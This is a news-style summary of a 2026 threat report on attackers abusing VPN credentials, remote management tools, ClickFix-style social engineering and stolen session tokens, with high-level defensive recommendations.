The digital doorways organizations rely on every day – remote access points and trusted administrative tools – are increasingly becoming the entry points for cyberattacks, according to a recent threat report. The 2026 Annual Threat Report, released by Blackpoint Cyber, details a significant shift in attacker behavior, moving away from traditional vulnerability exploitation toward leveraging legitimate credentials and tools to gain access and move within networks.
This isn’t about sophisticated, zero-day exploits, but rather a calculated abuse of everyday workflows. Attackers are successfully blending into normal operations, making detection significantly more challenging. The report, informed by analysis of thousands of security investigations throughout 2025, highlights how threat actors are exploiting the inherent trust placed in remote access solutions and IT management platforms. This trend in routine access as a pathway for modern intrusions demands a reevaluation of security strategies.
The findings reveal a concerning reliance on social engineering tactics, particularly deceptive campaigns that trick users into executing commands within their operating systems. These attacks, often bypassing traditional security measures, underscore the critical need for enhanced user awareness and robust endpoint protection. The report also points to the growing sophistication of cloud-based attacks, where attackers are reusing authenticated session tokens even with multi-factor authentication (MFA) in place.
The shift in tactics isn’t simply a change in *how* attackers gain access, but a change in *where* they’re focusing their efforts. Instead of spending resources on discovering and exploiting complex vulnerabilities, they’re capitalizing on the human element and the inherent trust organizations place in their own systems. This makes proactive defense – understanding normal behavior and identifying anomalies – more crucial than ever.
Attackers Favor Legitimate Access Over Exploits
The report’s analysis shows that attackers are more likely to log in using valid credentials than to exploit software vulnerabilities. SSL VPN abuse accounted for 32.8 percent of all identifiable incidents, making it a primary initial access vector. This often involves compromising credentials – through phishing or other means – and then using those credentials to establish legitimate-looking VPN sessions. Once inside, attackers can move laterally across the network with relative ease, often without triggering immediate alerts.
This isn’t to say that vulnerability exploitation is no longer a threat, but the report demonstrates a clear preference for leveraging existing access. It’s a more efficient and less risky approach for attackers, as it avoids the complexities and potential for detection associated with exploiting zero-day vulnerabilities.
Trusted Tools Become Weapons
Beyond VPNs, attackers are increasingly abusing legitimate Remote Monitoring and Management (RMM) tools. RMM abuse appeared in 30.3 percent of incidents, with ScreenConnect identified as being present in over 70 percent of rogue RMM cases. These tools, designed for IT administrators to remotely manage systems, can be incredibly powerful in the wrong hands. Because they often blend in with legitimate administrative activity, unauthorized installations and usage can be difficult to detect without strong visibility and monitoring.
The report emphasizes that organizations using multiple remote access tools are particularly vulnerable. The proliferation of these tools creates more opportunities for attackers to blend in and operate undetected. Maintaining a comprehensive inventory of approved RMM tools and promptly removing unused or legacy agents is a critical defensive measure.
Social Engineering Remains a Powerful Tactic
While legitimate access paths are becoming more common, user interaction remains a significant driver of incidents. Fake CAPTCHA and ClickFix-style campaigns accounted for 57.5 percent of all identifiable incidents. These campaigns rely on deceiving users into pasting commands into the Windows Run dialog, often disguised as a routine verification step. The commands, executed using built-in Windows tools, allow attackers to establish a foothold without downloading traditional malware.
This highlights the importance of user education and awareness training. Even with robust technical defenses, a single compromised user can provide an attacker with access to the entire network. Organizations need to empower their employees to recognize and report suspicious activity.
MFA Isn’t a Silver Bullet in the Cloud
The report also sheds light on the evolving tactics used in cloud-based attacks. While multi-factor authentication (MFA) is widely adopted, it’s not foolproof. Approximately 16 percent of cloud account disables documented in the report were the result of “adversary-in-the-middle” phishing attacks. In these scenarios, attackers capture authenticated session tokens *after* successful MFA and reuse them to access cloud services.
This demonstrates that MFA, while a crucial security measure, is not a complete solution. Attackers are finding ways to circumvent MFA by focusing on session hijacking rather than bypassing authentication altogether. Organizations need to implement additional security measures, such as Conditional Access policies that evaluate device posture, location, and session risk.
Defending Against the New Threat Landscape
The findings of the 2026 Annual Threat Report underscore the need for a proactive and layered security approach. Organizations must treat remote access as a high-risk activity, maintain a complete inventory of approved tools, and restrict unapproved software installations. Implementing Conditional Access controls and continuously monitoring for anomalous behavior are essential steps in mitigating the risk of these evolving threats.
Blackpoint Cyber will be hosting a live webinar to delve deeper into these findings and provide practical guidance on how to defend against these attacks. Registration for the webinar is now open, offering a valuable opportunity to learn from security experts and gain insights into the latest threat landscape.
The patterns documented in the report were observed across a range of sectors, including manufacturing, healthcare, managed service providers (MSPs), financial services, and construction, indicating a widespread vulnerability. As attackers continue to refine their tactics, organizations must prioritize proactive security measures and adapt their defenses to stay ahead of the curve.
Looking ahead, the focus for security teams will need to shift towards more granular visibility into network activity and a greater emphasis on behavioral analytics. Detecting anomalous behavior – even within legitimate workflows – will be critical in identifying and responding to these increasingly sophisticated attacks. The next step for many organizations will be a thorough review of their remote access policies and a reassessment of their overall security posture.
Have thoughts on this evolving threat landscape? Share your comments and insights below.
